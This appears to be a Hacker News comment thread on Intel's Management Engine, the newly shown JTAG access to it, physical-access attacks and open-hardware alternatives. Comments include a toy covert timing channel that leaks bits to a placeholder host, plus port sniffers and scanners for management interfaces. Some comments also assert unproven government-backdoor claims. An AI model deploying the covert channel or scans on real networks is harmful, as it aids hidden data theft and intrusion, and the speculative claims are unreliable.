The next realization is that there is no way to turn them off or remove them. It's possible even moving won't help.
And yet we really don’t seem to care much. Lesser issues generate national outrage and high volumes of press coverage. Why?
HN may be uniquely positioned to show us the answer. Take a community of people with generally above average interest and/or knowledge in this stuff, and the comments are filled with questions asking what the hell ME even is.
Apparently, ME is the perfect combination of opaque, obtuse, and obscure. It’s not rocket science, but complicated enough it’s hard to explain well quickly. It’s easy to be a highly technical person yet never have the need to cross paths with the subject. There has been some press, some activity, but all of that is simultaneously dampened for the same reasons.
I know we're used to "Internet speed" and the tweet happened an entire 24 hours ago, but give it a bit of time before declaring it dead. Wired and Vice need a second to write it up, and see if it hits the mainstream before declaring the issue ignored.
Not saying it will get picked up, though I sure hope it does, but as you point out, it's a bit obscure and takes some explaining.
Still, there are numerous reports that the Facebook app on your phone listens to every word you say to show you ads for things you were talking about, but on HN and other web forums there is always an element of disbelief. We may believe that it must be something else - correlation with web searches from the same IP - but there's never been proof one way or the other. (A Facebook exec's claim doesn't count as proof.)
So there's a section of people that believe they already have high-resolution recording devices that we take to bed. What's one more?
(Typing this, very gratefully, from an ARM Chromebook.)
There are plenty of hot scare pieces in the news after boring security leaks, all the time, bringing awareness to issues that technical people have known about for ages. For example, I'm hearing about friends' older parents putting tape over their laptop cameras.
We love to trash bugs that have marketing brands, but these exploits - and more importantly, obvious attack surfaces like the ME or cellphone modems - often just need the right amount of human-interest story, a practical real-life example, and a news-friendly explanation for regular people to care.
It tends to happen a lot more randomly and without a rational order of priority, but it's still happening more and more often. At the end of the day it's always going to come down to the time and effort of a security researcher caring and the tech community putting the effort in to make the journalists care.
Tape over laptop cameras isn't just a "parents-of-friends" thing, it's a good idea. Buy a set of stickers and support the EFF: https://supporters.eff.org/shop/laptop-camera-cover-set
Anyone know somebody at Wired?
Support the EFF! But I hate the stickers.
Everyone puts a sticker on their webcam and completely ignores the hot mic. But you get that false sense of security…
I did not break her phone in that way. Her phone is more dangerous.
Please note that a speaker may also act as a microphone if configured to do so (at the software level). This is especially true for speakers/headphones connected via the jack.
I (personally) think that intelligence/privacy-wise, the mic on many devices is a lot more troubling than the camera. A camera is very directional and (again, personally for me) would at most result in embarrassment? A microphone, on the other hand, can record all conversations in a room/apartment and transmit everything with fairly negligible bandwidth, and taping over it won't do much good. You actually need to open the device and disconnect/cut a wire.
Of course a switch would be nice, similar to the older Thinkpads which had a hardware switch for the network devices on the front, originally for use on airplanes.
Any chance you documented the procedure or have links to relevant documentation?
I wouldn't be surprised if the better Dell models have similar documentation available.
*: it's what we did on the One Laptop Per Child laptop, and I'm sure others have too.
Any idea where to get a CLI-from-boot notebook for teaching kids programming and encouraging a hacker ethic?
I think it would be about as easy to make a cardboard one.
The likelihood is that if an attacker has the ability to record audio, they also have the ability to bypass this device.
Not sure why you took that statement as deriding the practice because some older people are doing it? I noted it merely as an indication of how far the behavioural change has spread as a result of news stories... Of course it's good security hygiene. Not an ideal solution though, as others have already mentioned, compared to a hardware switch or built-in cover.
Across the mobile IT fleet we manage, the groups who covered or unplugged their webcams, internal or external, most consistently were middle-aged to older women, with women in their 30s or younger the least likely. Men covered randomly across all ages, but still less than women. And while they'd cover their laptop camera, most who didn't have a folding case did not also cover their tablet or phone cameras.
I don't know if it's comfort or awareness, but the ones who covered acted like it was common sense, and the ones who didn't hadn't considered it or felt like they weren't likely to be a target of interest. A few women said they chose their laptops because of the physical shutter over the camera.
I don't know if trust in electronics is more generational or age related, but it's definitely a gradient.
I think the threat profile faced by "the rest of us" is probably just a little less intense than someone as well known, wealthy, famous and influential as the CEO of Facebook, but perhaps that's just me.
You're right about this new development of the functional JTAG being very recent and needing time to get around. However, security folks and others have been decrying the potential of the IME backdoor for years.
That they've been largely ignored for years lends some credibility to the thought that "we don't seem to care much." It's hard for most laypeople to understand, and it's difficult to get people excited about something they don't understand (unless they are convinced that they do understand, of course).
How about an official statement from Facebook itself over a year ago? If it was true, people could find out by decompiling the app and make Facebook look absolutely horrible.
That also doesn't count as proof; it carries barely more weight than the Facebook exec's statement.
However, you're quite right about the decompiling argument. And chances are that security researchers have done just that.
The main thing I haven't gotten working yet is the touchpad. For wifi, I'm using an atheros dongle with open firmware.
Doesn't work for every Chromebook, but it does for many. Working fine on my Chrome Box.
> "(Typing this, very gratefully, from an ARM Chromebook.)"
Have you installed a non-stock OS on that Chromebook? Google aren't exactly known for being strong advocates of user privacy.
Imagine Intel were a Russian company. Tomorrow there would be a simple and clear [screaming] headline similar to "Russians hacked the election" (the general public doesn't need to know or understand how networks, computers, or elections actually work). The day after tomorrow it would be illegal to buy anything Intel.
The DREs don't seem to have been a target, though the physical and OPSEC vectors are quite well known at this point.
I'm not commenting on the information operations or the loose and ambiguous language that has been used to describe these events.
And the military are also dependent on foreign technology. If not for CPUs inside tanks and planes, then for CPUs inside command center computers. (and not just CPUs)
I do care, a lot. I have decided to avoid Intel (and AMD) hardware like the plague. I will not buy any Core iSpyOnYou or AMD equivalent anymore. I'm an advocate of economic and judicial sanctions against Intel (and AMD) at the political level. I tell people around me about the problems and explain how it is an issue of privacy, security, national sovereignty, and market power abuse.
I'm looking for a desktop computer for my day-to-day use that comes without compromised hardware. The Raspberry Pi 3 works quite well, but doesn't work without non-free software. I successfully installed Debian onto my A20-OLinuXino-MICRO, but the GUI doesn't start. I'm looking for hardware without Intel parts, without non-free software, with mainline Linux support, and preferably Debian-compatible. The OpenPower system by Raptor Engineering is simply too expensive. I cannot afford it. Any ideas?
Libreboot replaces the firmware on some decade-old server machines lacking an ME (although noisy, they work quite well as desktops).
The amount of money that Intel gets off these chips can't be significant, because they are already over two years old anyway (Q3'15).
That one can maybe fix a hardware backdoor in Intel chips does not make buying them any better. Intel does not get my money; it should instead get a clearly worded letter, with sanctions, from the authorities. I think they should be banned from trading and selling their backdoored stuff. I will not buy even old products from them. They messed up big time and don't even explain themselves.
So you are obviously right that proof of concept of fully FLOSS ARM phone doesn't directly translate to x86.
But it does show that they know how, and want, to build fully FLOSS systems. While they don't quite succeed 100% with the x86 system (as the management engine is still in my computer, albeit isolated and disabled), they have been making great strides in getting close to 100%, and I am willing to reward them for that.
Regarding the morality of buying Intel chips, I do share the reluctance to support Intel. I hadn't bought a new Intel computer or CPU since the Core2Duo in 2007, for that reason. But sometimes moral decisions can't be made in a binary, all-or-nothing manner. In this case I am aware of the damage done by purchasing an x86 system, but it's made up for by having a productive laptop on which I can more effectively work on FLOSS applications.
Depends on the kind of Mac you buy. I can only comment on their mobile offerings:
- Best supported are the current MacBook Airs. Everything except the webcam should work out-of-the-box. The webcam needs the out-of-tree bcwc_pcie driver (https://github.com/patjak/bcwc_pcie).
- The Retina MacBooks need some manual work before being usable (e.g. need to compile out-of-tree keyboard & touchpad driver (https://github.com/cb22/macbook12-spi-driver)), but should work fine as well.
- The MacBook Pros before October 2016 are also quite well supported; support for newer ones is still quite incomplete (check out https://github.com/Dunedan/mbp-2016-linux for details), although it's possible to use them as a daily driver if you're aware of the limitations.
All of the Macs I have require binary firmware blobs for WiFi, for the open source driver to work. And even in that case none of them can do even 802.11n. I have to use the proprietary WiFi driver to get 802.11n or 802.11ac. And yes each model varies in this regard, which makes it something of a Choose Your Own Adventure book.
Not innocuous, but probably less dangerous.
https://news.ycombinator.com/item?id=12584880 and others might have details on WiFi and such
I really wonder why the GPU situation is such a huge mess. Very few are supported by free drivers, and the closed drivers are, besides being closed, often of very low quality. Is patent law holding this situation stable? Isn't patent law supposed to promote progress? I feel it isn't working.
I think it's even more sinister: I would argue that a higher percentage of users on HN might be sworn to secrecy about any knowledge they might have anyway.
So you end up with very smart people who're either sworn to secrecy or who aren't; those who aren't are asking questions (and very few have answers, and those answers are partial or incorrect). Those who are can't answer them honestly or fully.
That is the argument I am asserting is dumb. And it is obviously dumb; in adversarial contests, you don't leave weaknesses exposed just because you might have other weaknesses. It also ignores the presence of differential threats; I may not care about hypothetical compromised NICs because my use case may not require a network, but I may need anti-evil-maid defenses.
Bottom line: in the context of discussing whether or not the ME is dangerous in the general case, other potential hardware threats are irrelevant, and I believe the argument is one used to intentionally muddy the waters.
Putting aside deeper strategies: I'm not going to argue about game theory here.
And your (valid) refutation of that part in no way implies spending less time reverse engineering and disabling ME, nor being less excited about this tweet. Correct?
I'm sure that I'm far from the only one.
- create tools to help fight what you deem contrary to things that are important to you
- dispatch leaks in subtle ways so that humanity is not left in the dark
- lead anonymous and discreet communities of people sharing your beliefs, your skills, and your passion to improve things
Be careful. And best of luck.
But I haven't seen anything that worried me. Besides, those NDAs are legally binding promises; I take those seriously.
"As shown in the presentation by security researchers Maxim Goryachy and Mark Ermolov, one way of accessing the JTAG debugging interface" "is to use a" "hardware implant" "running Godsurge" "which can exploit the JTAG debugging interface. Originally used by the National Security Agency -- and exposed by Edward Snowden -- Godsurge is malware engineered to hook into a PC’s boot loader to monitor activity. It was originally meant to live on the motherboard and remain completely undetectable outside a forensic investigation."
But this all was in January:
"The claim was made during a presentation" "which showed how hackers could use a cheap device to gain access to a debugging interface embedded in hardware."
What's the news now compared to then?
It is not just a matter of apathy. They get violently ill at being told to think about protecting themselves. If you tell them, for example, not to put their debit card into an ATM without giving the card reader a tug first to see if it's real, they'll do it wrong anyway just to spite you. It isn't that giving the tug is hard or that it isn't wise; they simply do not want you to be right, or to have to think about it.
Admitting that you are right about that one little thing means they have to deal with all the other issues that you brought up as well. There is probably an interesting field of psychology to be researched with just that phenomenon alone. I don't think this is just the people I know personally, because I've encountered a lot of the public who have this mindset as well. It is how we got ourselves into these problems in the first place, with no recourse.
I stopped sending the emails about a year ago because they asked me to. The stated reason is that no one cares about security, and a number of them had already auto-forwarded me to the junk folder, or told me they saw my name and would skip my emails and not open them. I don't even feel like bringing it up again now that it is a live concern. They will continue to not care.
I find it frustrating.
EDIT: I've disabled Intel ME on my machines. I would offer to do it for others but they'd have to acknowledge it's something that concerns them to want that help, and they won't.
Not really how I think of it. Seems more similar to waking up one day and realizing Tesla controls your Tesla car remotely. Or that Microsoft can push bad updates to Windows. Or Google can push bad updates to Chrome.
> And yet we really don’t seem to care much. Lesser issues generate national outrage and high volumes of press coverage. Why?
On my end it's because I have not seen a single shred of evidence that it has been used for spying, and because I figure the moment anyone becomes aware of that happening, people would probably find a way to block the network traffic at the router or somewhere else.
Now I can't wait for rogue monero miners to use ME to propagate :)
- If it were to periodically "check in" with an external server to see if it needs to do any kind of spying -- admins would notice the network traffic.
- If it needed to be contacted externally to "initiate" any kind of spying at all, that would mean anyone behind a NAT would be safe. Furthermore, the moment anybody noticed such a thing, it would make the headlines and get blocked on networks, so this capability would need to be kept secret and turned off except for ultra-high-value targets... which most people do not view themselves as. (A sketch of what such monitoring might look like follows.)
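For what it's worth, here's a rough sketch of what "admins would notice" could look like in practice: a passive sniffer flagging anything on the documented AMT ports (16992-16995). This assumes scapy is installed; a real implant could of course use any port, so treat it as illustrative only.

    # Passive watch for traffic on the documented Intel AMT TCP ports.
    # Run with capture privileges, ideally on a mirror/SPAN port so it
    # sees traffic the monitored host's own OS might hide from itself.
    from scapy.all import sniff, IP, TCP

    AMT_PORTS = {16992, 16993, 16994, 16995}

    def flag_amt(pkt):
        if IP in pkt and TCP in pkt and \
           (pkt[TCP].sport in AMT_PORTS or pkt[TCP].dport in AMT_PORTS):
            print("possible AMT traffic: %s:%d -> %s:%d" %
                  (pkt[IP].src, pkt[TCP].sport, pkt[IP].dst, pkt[TCP].dport))

    sniff(filter="tcp portrange 16992-16995", prn=flag_amt, store=False)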
The NSA routinely intercepted Google internal traffic. Did Google, who are presumably running the most advanced network on the planet and staffed by people who don't suck, notice the intrusion? They did not; they got informed via PowerPoint.
While the sophistication of the attackers decreases as you move from NSA to random hackers, so does the sophistication of the network as you move from Google to mid-sized businesses.
How are these even similar? Did the NSA ever send traffic of their own on the Google network infrastructure? Citation needed if so, because I recall they merely listened in on existing traffic using external network equipment.
Not at all.
When you have something that good, you use it for specific targeting. You get a guy with a work laptop at home, you infect him, then you use the machine to get one closer to your objective. Slowly. With time between the events. Without being a beacon in the network.
Or you just use it to spy on a guy you suspect.
Or to get access to the secrets of somebody you wanna blackmail.
Did you even read what I wrote? Specifically the last sentence?
Admins would use dedicated network hardware, with network chipsets driven by closed-source firmware.
In a crazy but technically doable scenario, that closed-source firmware could contain instructions to "send packets containing magic word X to address a.b.c.d" and not report or count that traffic, even to applications opening the device in promiscuous mode, with all routers in between obeying the same instructions. Not a single byte would be reported, counted, or sniffed unless someone sticks a digital analyzer on the network cable.
No, I fully expect there are enough admins out there running dedicated hardware whose design & source code they have access to. That is sufficient.
Similarly, inbound control signals could be delivered by modifying inbound traffic in ways that the ME observes and decodes.
Depending on your throughput needs the signal could be delivered subtly by for example modifying the timing between packets in a way that would be very hard to identify as a signal.
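To make the timing idea concrete, here's a toy sketch of such a covert channel: bits encoded purely as the gap between otherwise-innocent packets. The host, port, and delay thresholds are made up for illustration; a real implant would piggyback on legitimate flows and use far subtler timing.

    # Toy inter-packet-timing covert channel: the payload is irrelevant,
    # the delay between datagrams *is* the signal.
    import socket, time

    SHORT, LONG = 0.05, 0.15  # assumed gaps encoding bit 0 / bit 1

    def leak_bits(bits, dst=("198.51.100.7", 53)):  # placeholder receiver
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        for b in bits:
            s.sendto(b"\x00", dst)
            time.sleep(LONG if b else SHORT)
        s.sendto(b"\x00", dst)  # final packet closes the last gap

    leak_bits([1, 0, 1, 1, 0, 0, 1, 0])  # one byte, slowly and quietly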
I’m hoping the ME firmware now gets dumped and studied closely. I’m betting there are some surprises in there.
Until there is evidence, this is technically just a government conspiracy theory.
The way I see it is Intel ME is a processor-level application that has full control of all computer activity and cannot be blocked or disabled and can be accessed and controlled remotely.
Would like to hear other people's opinions of what it is.
So, the three O's are a useful conceptual tool for understanding the combination of traits that exploits the realities of human psychology, and for explaining why no one seems to care: technical paralysis stifles apparent relevance.
It's not only a means of explaining sneaky cloak and dagger stuff. You could describe lots of niche tech staples with this mnemonic.
When something is difficult to explain, that's often enough to derail any casual conversation with simple mental fatigue.
E.g. this tool: https://github.com/corna/me_cleaner
It's that even those of us that care vehemently, have no recourse. It is impossible to fight a secret police state.
Part of winning is to even begin to believe you can fight...
RISC-V is an open ISA that looks promising. Unfortunately, the privileged instruction set, which is important for getting a full modern OS up and running, is still a draft.
lowRISC is a non-profit open hardware company that has been working on a fully open RISC-V-based SoC that can run Linux. On their about page they claim it'll be ready this year.
There's also the stuff from SiFive. They have an Arduino-compatible microcontroller, and ongoing work on a 64-bit quad-core. I don't think their hardware is open, though.
Commercially there's no alternative. Enterprises even use Microsoft over Linux/BSD. Why would they get rid of Intel?
For anti-US-spying purposes, a firewall should be enough.
I think I am a bit out of the current state of events. Is ME short for management engine? If that is the case, what is the problem with it?
Most people do not have any concrete notion about what management engines are. People weren't that skeeved out by Alexa, and that was a pretty easy-to-understand system. There's no way that people will have any kind of personal connection to something that they barely are aware of and don't understand.
Sure, if by one day you mean - for the past 10 years? And if by spy cams you mean - A product with official documentation from the vendor, and similar to other products from other vendors. And these products can be purchased by anyone.
You have some valid points, but they are clouded by your sweeping generalizations and needlessly polarizing language.
We've now entered a realm where an attacker could simply plug a device into a USB port of your computer for a few seconds to access your CPU's ME through USB JTAG and take it over, allowing him full access and control over what you do/read/open/type over the network, without you ever knowing it, since you can't see it.
And the only way to get rid of it for sure would be to pretty much throw that cpu away and buy a new one.
Or am I being overly paranoid, and there is something I haven't considered that makes this scenario impossible?
EDIT: given the answers I think my main concern wasn't well expressed above. I'm not saying this as in "ME is making it easier to be compromised". That may or may not be true, but that's not my point.
My point is, we all know that once compromised, you can't clean it and need to burn it all and start from scratch: recover from backup (not files on the compromised machine), format everything, reinstall.
Due to the nature of the ME, this is not a solution here. The cleanup needs to be done at the hardware level. Unless I misunderstood something, once it happens, your cpu is done for, period.
And 'using a hack to clean up the hack' is still in the realm of cleaning up rather than starting from scratch; it's not a solution, for the same reason that cleaning up your compromised Linux box is not one and you need to start from scratch.
The concern with the Intel ME is that it has a native network adapter. You can bet efforts are currently underway to discover how to exploit the ME remotely. THAT'S when things get scary.
Your paranoia is not unjustified. Personally, I am nervous that some of my systems have the ME. When attention turned to it about a year ago, I knew it would only be a matter of time before someone broke into it.
Yep, this is the big deal. After I "discovered" the ME, my first stop on my home network was the switch, to block all that crap; a rough scan sketch for finding such listeners follows below. (And I found my storage server, equipped with a Supermicro all-in-one motherboard, had helpfully grabbed an IP for the ME to listen on, with an 'admin/admin' password.)
I just wish the empire builders at the NSA would care about something other than their own little power center. They knew this would happen - it always does. The NSA is probably the biggest security threat to the U.S. people at this point, because they keep building concentrated, high-value targets and then lose control of them.
 Not to be confused with 'U.S. government interests'.
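If anyone wants to do the same audit of their LAN, a crude sketch: connect-scan each host for the default AMT ports (16992-16995; 623/664 are also associated with IPMI/ME-style management) and block or VLAN-off whatever answers. The subnet below is a placeholder.

    # Crude scan for hosts answering on well-known AMT/management ports,
    # as candidates for a switch-level block.
    import socket

    SUSPECT_PORTS = [623, 664, 16992, 16993, 16994, 16995]

    def open_mgmt_ports(host, timeout=0.5):
        found = []
        for port in SUSPECT_PORTS:
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                s.settimeout(timeout)
                if s.connect_ex((host, port)) == 0:  # 0 means connected
                    found.append(port)
        return found

    for i in range(1, 255):
        host = "192.168.1.%d" % i  # placeholder subnet
        ports = open_mgmt_ports(host)
        if ports:
            print("%s answers on %s" % (host, ports))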
This is a useful document for understanding what exactly you're dealing with and what to do about it:
BMC doesn't always use a dedicated physical port, and it's commonly bridged in sideband to the other NICs on a server.
IOMMU effectively solves the "DMA is completely broken" problem, as far as I'm aware.
Evil Maid attacks are mostly worrisome because even UEFI cannot protect you against some bootloader attacks (what if you disable UEFI, or reflash the firmware with a bootloader that just looks like a UEFI boot?). There are some usages of TPMs that seem quite promising (they revolve around doing a reverse-TOTP-style verification of your laptop, to ensure that the TPM has certified the entire boot chain; see the sketch after this comment).
It's quite a hard problem, made significantly harder by the fact that every fucking hardware vendor seems to want to make our machines even less secure.
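For the curious, the TOTP half of that reverse-verification idea is the easy bit; here's a minimal sketch (per RFC 6238). The actual scheme hinges on the TPM only unsealing the shared secret when the measured boot chain matches - all of that PCR/sealing plumbing is omitted here, and it's the genuinely hard part.

    # Standard TOTP (RFC 6238, with RFC 4226 dynamic truncation). In the
    # scheme above, the laptop can only compute this if the TPM unseals
    # `secret`, which it only does for an unmodified boot chain; you then
    # check the displayed code against the same computation on your phone.
    import hmac, hashlib, struct, time

    def totp(secret, interval=30, digits=6):
        counter = int(time.time()) // interval
        digest = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
        offset = digest[-1] & 0x0F
        code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
        return str(code % 10 ** digits).zfill(digits)

    print(totp(b"secret-sealed-to-boot-PCRs"))  # placeholder secret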
Through this attack, they could compromise the ME long-term, which means the long-accepted "nuke it from orbit" solution to a security breach (unplug everything, format everything, start from scratch) still wouldn't be enough; that entire chip is done for. And 'using a hack to clean up the hack' is still in the realm of cleaning up rather than starting from scratch; it's not a solution, for the same reason that cleaning up your compromised Linux box is not one and you need to start from scratch.
I bought a second-hand Lenovo T420s a couple of years back, and was absolutely horrified at the remote management available on it - including management over WLAN.
Sure the features are gated by price/cpu "brand" - but I think it's safe to assume a) this is complex software and will have bugs with security implications b) once it's well enough understood - it seems likely it can be "upgraded" (similar to how you today can eg: replace the bios with coreboot).
The conclusion is that we need new platforms - perhaps power5 will help.
If the attack can be pulled off with only one-time access, it’s worse than an evil maid attack.
I can't help but to think of all those exploits that target anti-virus software.
When you think about it, "it seemed like a good idea at the time" can explain most tragedies in human history.
So if mass disruption of the very systems that support your life can have supporters in a community composed of smart and actively debating people, "it seemed like a good idea at the time" probably happens every week at gov agencies.
What leads to failures, and I suspect happened at Intel, was that they mistook a very localized consensus for a broader one. There's a word for this, it's called "groupthink". A group of people can talk themselves into doing something very stupid (or evil) while still thinking they're doing the right thing, given enough time and motivation.
There was no widespread consensus, outside of Intel, that the IME was a good idea. If they had solicited opinions from outside their organization, they would doubtless have gotten horrified reactions. But they didn't, or if they did they must have dismissed those concerns, because they went through with the bad idea anyway.
The apparent secrecy with which they developed the IME is also a cause for alarm; groups of people who operate in isolation are particularly prone to groupthink, and so even if their motivations are good ones, the fact that they are working without continuous feedback from anyone on the outside raises the chances of a perverse outcome.
At least now that everyone can see the problem people can make informed decisions.
- felt guilty about it and decided to make amends
My money is on exploits having been on the black market for a while now. We just have an official public demo now.
Rule of thumb: when something that catastrophic is made public, the worst already happened and you are late to the party.
In white hats we trust :)
In tin-foil hats, we trust, more like!
In Faraday cages we trust.
But yes, I hope that with this it'll be possible to completely remove the remaining few hundred kB of Intel ME code remaining.
Of course it is, because the USB DCI attack is one level below the Intel ME. Even if the ME is deactivated via HAP, which basically puts the ME code into an infinite loop or a CPU halt state, both can be reversed by JTAG.
If they have full debugger access to what's running in Intel ME then removing the code from the firmware probably doesn't make a difference (assuming they can run un-trusted code in that context). If they cannot write their own code and so an attack requires ROP gadgets then removing the code might make it harder (or impossible) to do, but I doubt it.
Huge corporations backed up by gov agencies with a lot of time, money and skilled people VS a few people working for free because they believe they should. Not a fair fight.
I thought this behavior disappeared ~10 years ago.
However there are bugs in USB stacks, especially now you can do so many alternate protocols over USB-C.
There's nothing fundamental in the USB spec that lets devices execute code on the host.
I know some of you might argue that even generic USB sticks can do damage and, whilst I agree, this attack is still a degree worse than most of those.
Thus far the most damage an unknown USB stick could do was type commands as a fake keyboard (visible to user) or exploit a driver vulnerability to silently cause mischief.
Correct me if I'm wrong, but those cases could still be trivially stopped by a security policy set by administrators disallowing unknown USB devices. (Of course, how many places would use this is another matter, but it's still very important for places where this does matter.)
This attack, on the other hand, would seem to be able to completely bypass your operating system's restrictions on USB ports.
Why? Security knows there are always bugs in software, and assumes they exist. Thanks to @h0t_max, the rest of us know this particular bug exists, but this bug has been around for a while - who's to say evil hax0rs didn't find this bug years ago and have been exploiting it since?
Or put another way: you say an unknown USB stick could exploit a driver vulnerability to silently cause mischief, and then claim that this is easily stopped if an administrator sets a security policy to disallow unknown USB devices. (I assume you mean a Windows GPO-enforced policy or similar, not a written social policy.) Who's to say the code that enforces the policy doesn't have exploitable bugs? What if the driver for a known USB stick has exploits?
Physical access is physical access, and while there are mitigations for the evil maid attack (like an encrypted drive and shutting down -not just suspending, when the machine is out of sight), there simply is no way around the fact that physical access is game over.
That mitigation is useless against Evil Maid. There are much more sophisticated mitigations (using a TPM to measure the boot, and then do something akin to TOTP in order to allow the user to actually verify the state of the machine) which actually could protect against Evil Maid almost completely (assuming you don't have something like Intel ME that cannot be verified by the TPM).
"Once you have physical access it's game over" is a very common response to these discussions, and I find it incredibly defeatist. Of course physical access means that the "clock is ticking" until your data is compromised, but sufficient protections can dampen the impact or increase the difficulty.
For example: IOMMU protects against DMA-based attacks, something that was impossible to protect against several years ago. This doesn't mean that someone cannot launch other attacks, but it does mean that the trivial "just plug anything into a USB port and you have DMA" attack is no longer possible.
Encrypted drive + shutdown is a defense against a specific Evil Maid attack: the cold boot attack. It is not a very expensive attack to run; for the cost of a can of compressed air and a USB drive, anybody sophisticated can pull it off. https://en.wikipedia.org/wiki/Cold_boot_attack
Sorry to sound defeatist, but if you had been relying on IOMMU to save you, the trivial "plug anything into a USB port and you have CPU JTAG access" attack has always been possible. (Never mind that IOMMU implementations aren't guaranteed to be bug free.)
In the face of that, what do you do?
With this knowledge, all I really can do is stay up to date and patch-patch-patch. Have a travel Chromebook for leaving in hotel rooms, but ultimately I just have to know that it's not enough, especially against a CIA-grade Evil Maid, or an Evil Maid that's able to factor 4096-bit RSA keys. (That last one's not theoretical, either. It was revealed a few weeks ago that TPMs in Chromebooks and other hardware were generating weak keys, leading to cloud-factorable 4096-bit RSA keys.)
A less-sophisticated Evil Maid can still physically steal my laptop for pawning, and even if they can't get my data, I've still had my laptop stolen. Not-being-defeatist, I backup my data, although that has a totally different set of security concerns over the Internet.
Access to a USB port is not physical access. USB is a network interface that is commonly used to connect host computers to small portable embedded systems, often tiny NAS units of other people also known as USB flash drives.
This interpretation of "you're being overly paranoid" is new to me ;)
Can you not see the difference between an attacker opening the case and stealing your HD, vs inserting USB key for a few seconds, then going away, and exploiting later at their leisure?
Software do-over is a very well-accepted solution (don't bother cleaning the rootkit, just format and reinstall), but hardware do-over (replace the CPU) is going to be a hard pill to swallow.
Intel ME and the (assumed) partnership with the CIA to design and build this system should be an absolute blow to the integrity of their business long-term. Will you, as lead engineer or sysadmin for your mission-critical business, now continue to choose Intel products to help build your infrastructure?
Unfortunately it seems that our modern market has not yet evolved enough to punish companies involved in such reckless behavior. I suspect the reason is primarily the ease with which governments can mass-tax and create fiat currency. Perhaps there is some alternate decentralized currency system that would limit government's ability to tax, print, and award juicy big-brother contracts to these companies.
Anyway, for now, at best - and perhaps somewhat encouraging - is the subsequent brain drain of engineers and hackers alike who want nothing to do with faceless corporations like Intel, Google, Facebook, IBM, et al. who routinely deceive/exploit and work against the best interests of their own customers.
I worked at Intel on ME and the things that came before it until around 2013. I can tell you two things --
1. No, Intel ME wasn't born out of a desire to spy on people nor was it -- to the best of my knowledge but I honestly believe I would know -- created at the request of the US government (or others). It was an honest attempt at providing a functionality that we believed was useful for sysadmins. If it was something done for the CIA, I believe it would probably have been kept secret instead of marketed.
2. It was initially going to be much "worse". Early pilots with actual customers - such as a large British bank - were going to run a lot more stuff (think a full JVM) and have a lot more direct access to the user land. Security concerns scrapped those ideas pretty early on, though.
In retrospect, I personally believe the whole thing was a bad idea and everybody is free to crap on Intel for it. But the thing was never intended as a backdoor or anything like that.
1. Why did your team deem it necessary to deny the end-user the capability to disable this feature?
2. Why did your team decide to enable ME on ALL consumer grade chips? You could have only enabled it on, say, Xeon, as a value-add - exactly like you do for ECC support. You could have made more money this way. But . . . you didn't.
Without legitimate, sensical answers to the above questions, there is no reason for anyone to believe your team did anything other than design a backdoor for the Feds. Sorry.
The same techniques for managing server farms are useful for managing hundreds or thousands of corporate desktops. Being able to power up a desktop (“lights out” management) and re-image it at 3:00AM is very useful, for example; the wake-on-LAN sketch below shows the simplest form of that idea. You could also install 3rd-party security products on the ME to provide higher-level threat detection that’s hard for a rootkit to hide from. So once the work of getting an integrated management engine production-ready was complete, it made perfect sense to use it in corporate desktops. It’s expensive to produce chip variants, so doubtless further cost pressures led Intel to put the ME in the core silicon shared across all products. Plus, now IT admins can let the VP of Sales get the laptop she wants, knowing they can leverage their System Center/OpenDesk/etc. console to manage it via the ME.
So no, they aren’t a Fed backdoor. Those of us who worked in IT 10 years ago remember how the market drove Intel to add the ME. That is doubtless why many are silently conflicted. They don’t want to take a big step back. They likely are expecting/hoping Intel will “fix” the problem.
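AMT's power-on runs over its own authenticated protocol, but the bare-bones ancestor of the "lights out, 3:00AM re-image" idea is the classic wake-on-LAN magic packet: six 0xFF bytes, then the target MAC sixteen times, broadcast over UDP. A sketch (MAC and broadcast address are placeholders):

    # Classic wake-on-LAN magic packet - the simplest form of the remote
    # power-up that AMT/ME provide in managed fleets.
    import socket

    def wake(mac, broadcast="192.168.1.255", port=9):
        payload = b"\xff" * 6 + bytes.fromhex(mac.replace(":", "")) * 16
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
            s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
            s.sendto(payload, (broadcast, port))

    wake("00:11:22:33:44:55")  # placeholder MAC of the machine to power up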
Even Raptor's high-security Talos II has a BMC; the issue isn't having a BMC, the issue is that it's not owner controlled and it's not auditable.
What's wrong with the ME is that
a) it only accepts Intel-signed code; I can't replace the ME firmware with an implementation (e.g. of remote management functionality) that I trust. I also can't repair vulnerabilities in it without the cooperation of both Intel and the vendor (which is often not forthcoming).
Consider the Authorization header bug in the ME's webserver and multiply it by how many machines you claim use this remote management functionality. That's horrifying.
b) it has DMA access to main memory, which is insane.
Look at the fact that every server nowadays has a BMC, in addition to the ME. On a client device the ME would be used to implement similar functionality, so the BMC is actually a wasteful duplication - but server vendors have to use a BMC because they can't program the ME to implement the remote management functionality they need, because only Intel can program the ME. This is stupid.
Would it be possible in future CPU designs to put a jumper in, e.g., the ME power path? Closed by default (and possibly forced closed in enterprise-targeted devices), but the option exists to disable the ME without requiring an additional CPU variant.
Back when ME’s were discrete, you would inevitably have some with, some without. Someone would order a bunch of machines without them to “save money” or they bought a model that just didn’t have an ME add on offered by the OEM.
That meant that occasionally you had to actually have the machine in your presence to service it. You end up designing two processes/procedures based on whether you are remote or not. Lack of ME’s actually increased labor costs by reducing the number of machines a tech could manage (on average).
Having a CPU fuse essentially winds the clock back to the discrete-ME days. Someone will place an order for SKU ENCH-81-U instead of EMCH-81-U, and you'll end up with 500 machines with the ME fuse blown. Inevitably there will be a big enough restocking fee that someone in accounting will say “just use them.”
(The same applies to things like having/not having a TPM module, etc.)
It would have made much more sense to require you to enable it before first use, and ship it as disabled from the factory. Enablement should work like blowing an eFuse where it's never off once it's turned on, but if you never turn it on it doesn't exist. Then I don't have to worry about the feature unless I know exactly what it is and how to use it.
Older products had jumpers, physical switches, or software mechanisms for securely updating firmware. The first two are immune to most types of remote attacks if done in hardware. Intel already uses signed updates for microcode, which people aren't compromising remotely left and right (a sketch of that pattern follows below). Intel supporting a mechanism like those that already existed in the market for disabling the backdoor would not give widespread, remote access to systems. If anything, it would block it, by having less privileged, 0-day-ridden software running.
I'll also note that the non-Intel market, from OpenPOWER to embedded, has options ranging from open firmware (incl Open Firmware itself) to physical mechanisms to 3rd-party-software. Intel is ignoring those on purpose for reasons they aren't disclosing to the users that also probably don't benefit them.
